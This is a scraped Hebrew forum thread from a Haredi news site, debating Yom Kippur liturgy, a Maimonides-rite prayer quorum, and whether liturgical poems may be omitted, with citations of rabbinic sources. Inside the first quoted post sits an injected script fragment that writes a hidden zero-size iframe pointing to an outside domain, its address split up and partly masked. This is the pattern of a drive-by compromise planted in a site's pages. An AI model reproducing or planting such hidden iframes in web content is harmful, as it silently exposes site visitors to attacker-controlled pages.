בית פורומים עצור כאן חושבים

תפילות יום כיפור

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-5/10/2014 22:30 לינק ישיר 

מיימוני כתב:
מואדיב

מי לא מוכן לוותר על "עלינו"?

מי לא מוכן להעמיד את התפילה על נוסח הרמב"ם?

אני כן.

נא להודיע כאן על פתיחת המנין החדש, מנין רמב"ם, בעיר התורה בני ברק.

< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

אין אצל הדרדעים?
אם כבר אז כדאי לחזור לנוסח ארץ ישראל הקדמון http://he.wikipedia.org/wiki/%D7%A0%D7%95%D7%A1%D7%97_%D7%90%D7%A8%D7%A5_%D7%99%D7%A9%D7%A8%D7%90%D7%9C#.D7.97.D7.96.D7.A8.D7.AA.D7.95_.D7.A9.D7.9C_.D7.A0.D7.95.D7.A1.D7.97_.D7.90.D7.A8.D7.A5_.D7.99.D7.A9.D7.A8.D7.90.D7.9C_.D7.91.D7.99.D7.9E.D7.99.D7.A0.D7.95

דדווח על תוכן פוגעני

נשלח ב-5/10/2014 22:34 לינק ישיר 

איפה בתנ"ך אתה מוצא את כל  הדברים צום בכי ומספד בקשר ליום הכיפורים?  עיין היטב בתנך. ותגלה שצום לא בהקשר לי לחודש השבעי יום הכיפורים. צום ומספד מופיע רק במגילת אסתר, כלי קשר ליום הכיפורים.
מה שייך כאן לסמוך על חז"ל, איני שולל את חז"ל בצורה קטגורית. היו חיים בבית ראשון ושני והנהגות חברתיות.

מואדיב
אנחנו שוב חלוקים.  אין מצווה להתפלל את התפילות הארוכות ביום הכיפורים ואפילו לא הקצרות.
הרעיון של יום הכיפורים בתורה ובחז"ל הוא יום של חשבון נפש. אל זה אפשר להגיע רק עם חוויה דתית.
לא פלא שמיד לאחר הנעילה שכולנו כביכול נקיים מחטא- אומרים ויהי רחום יכפר עוון, איזה עוון? העוון של התפילות כביכול מהשפה אל החוץ. שאיתה רימינו את עצמנו.

דדווח על תוכן פוגעני

נשלח ב-5/10/2014 22:35 לינק ישיר 
אין חדש מתחת השמש

maxmen כתב:
www.youtube.com/watch?v=Ppz9WLVfeD4

דדווח על תוכן פוגעני

נשלח ב-6/10/2014 06:41 לינק ישיר 

בעל >הפיוטים האשכנזיים ברובם התחברו בארץ ישראל< [DOC]מנהג א"י ומנהג בבל פיוטים בתוך התפילה: מנהג שמד: טענת השמד שהעלה פירקוי בן באבוי מועלית שוב כשלש מאות שנה אחריו בספרד. ר' יהודה אלברצלוני (תלמיד הרי"ף) בספר העיתים טוען כי הפיוטים הרבים שהוכנסו לתפילה בא"י הם מנהגי שמד. __________________ במשך שנים רבות חשבתי, מהו פירושם של הפיוטים שאני אומר, וכשנתקלתי במחזורו של גולדשמיד, התחלתי להבין את הפיוטים שאני אומר, אך לא היה לי זמן לומר אותם. מה עדיף? לומר מבלי להבין, או להבין מבלי לומר? __________________ אשכול ישן שלי בנושא ה''פיוטים המבולבלים:'' http://www.bhol.co.il/forums/topic.asp?topic_id=1600642&forum_id=1364

תוקן על ידי נישטאיך ב- 06/10/2014 07:17:28

דדווח על תוכן פוגעני

נשלח ב-6/10/2014 08:11 לינק ישיר 

בעל 

<הפיוטים האשכנזיים ברובם התחברו בארץ ישראל>

מנהג א"י ומנהג בבל 

פיוטים בתוך התפילה: מנהג שמד:

טענת השמד שהעלה פירקוי בן באבוי מועלית שוב כשלש מאות שנה אחריו בספרד. ר' יהודה אלברצלוני (תלמיד הרי"ף) בספר העיתים טוען כי הפיוטים הרבים שהוכנסו לתפילה בא"י הם מנהגי שמד.

במשך שנים רבות חשבתי, מהו פירושם של הפיוטים שאני אומר, וכשנתקלתי במחזורו של גולדשמיד, התחלתי להבין את הפיוטים שאני אומר, אך לא היה לי זמן לומר אותם. מה עדיף? לומר מבלי להבין, או להבין מבלי לומר?

אשכול ישן שלי בענין ה"פיוטים המבולבלים":

http://www.bhol.co.il/forums/topic.asp?topic_id=1600642&forum_id=1364

תוקן על ידי נישטאיך ב- 06/10/2014 09:06:54

דדווח על תוכן פוגעני

נשלח ב-6/10/2014 09:03 לינק ישיר 

נישט
קצת קשה שכאלו יצירות מובנות, מתוחכמות ומפוארות הן רק מנהג שמד.

דדווח על תוכן פוגעני

נשלח ב-6/10/2014 09:36 לינק ישיר 

אין צורך בתעשיה כדי לכתוב פיוטים, אנשים יצירתיים יתר תחת לחץ.

דדווח על תוכן פוגעני

נשלח ב-6/10/2014 11:12 לינק ישיר 

מיימוני, מצאתי באשכול של נישטאיך את דברי החוות יאיר:"והב"ח כתב ששני גדולי רבנים נענשו על שבטלו לומר פיוטים בקהל שלהם יע"ש לכן ודאי כל יחיד יחוש לעצמו שלא יפרוש מלאמרם בציבור (ובהיותו בביתו עכ"פ לא יפסיק בהם תוך הברכות רק יאמרם אחר תפילתו.)"

בטוח שאתה רוצה להקים את מניין רמב"ם?

דדווח על תוכן פוגעני

נשלח ב-6/10/2014 11:57 לינק ישיר 

אריאל
לא מדובר בקהל שלו. מדובר על הקמת קהל חדש,

שאלת תם האם הוא קיבל הודעת סמס מהשמיים שבגלל זה הם נענשו?

דדווח על תוכן פוגעני

נשלח ב-7/10/2014 05:48 לינק ישיר 

<האם הוא קיבל הודעת סמס מהשמיים שבגלל זה הם נענשו?>

ראה במהרי"ל (מנהגים) הלכות יום כיפור אות יא, שאת פתיחתו הבאתי בתחילת אשכולי "ניגוני תפילות הימים הנוראים":

"אמר מהר"י סג"ל אין לשנות מנהג המקום בשום ענין אפילו בניגונים שאין מורגלים שם. וסיפר לנו מעשה בעצמו שהיה שליח ציבור פעם אחת בקהלת רעגנשפורג בימים הנוראים, והיה מנגן כל התפלה כמנהג מדינת אושטרייך כי כן המנהג שם. והוקשה בעיניו שהיו אומרים הפטרה בניגון בני ריינוס. ואמר שבאותו פעם היה הוא אומר סליחה אני אני המדבר אשר יסד רבינו אפרים לומר לתפלת מוסף, וסבר שמצוה לומר שם לכבוד רבינו אפרים המחבר אשר מנוחת כבודו שם. ואמרו המנהיגים אליו שאין מנהגם לומר אותה הסליחה ולא שמע אליהם מסברתו דלעיל. לימים מתה בת הרב ביום כפור והצדיק הרב הנזכר עליו הדין שלקתה בתו על מה ששינה מנהג המקום".

דדווח על תוכן פוגעני

נשלח ב-7/10/2014 11:45 לינק ישיר 

נישט
באופן אישי אתה מאמין בזה?

דדווח על תוכן פוגעני

נשלח ב-7/10/2014 13:43 לינק ישיר 

ירוחם,
נישט לא צריך להאמין בזה. מספיק שמהרי"ל האמין בזה.

אם לך הסיפור לא מספיק, נסה את זה
(מתוך כת"י ירושלים oct. 3182, שהועתק באשכנז בראשית המאה השש עשרה)

דדווח על תוכן פוגעני

סמל אישי
נשלח ב-7/10/2014 14:52 לינק ישיר 

ראב"ן שלח תרנגול מכושף לקרוע את עור פני הפרנס?

דדווח על תוכן פוגעני

נשלח ב-7/10/2014 15:50 לינק ישיר 

הדברים הרי ברורים כשמש- איסור כישוף הוא רק מדאוריתא. אבל ביטול הפיוטים? אין מה להשוות.

דדווח על תוכן פוגעני

נשלח ב-7/10/2014 16:18 לינק ישיר 

אריאל, זה סיפור. אגדה.  אתה מתווכח עם סיפור?
אגב, הסיפור הזה הוא לא פחות סיפורי ממעשה דרבי אמנון.

דדווח על תוכן פוגעני

סמל אישי

בית > פורומים > דת ואמונה > עצור כאן חושבים > תפילות יום כיפור
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 לדף הבא סך הכל 5 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.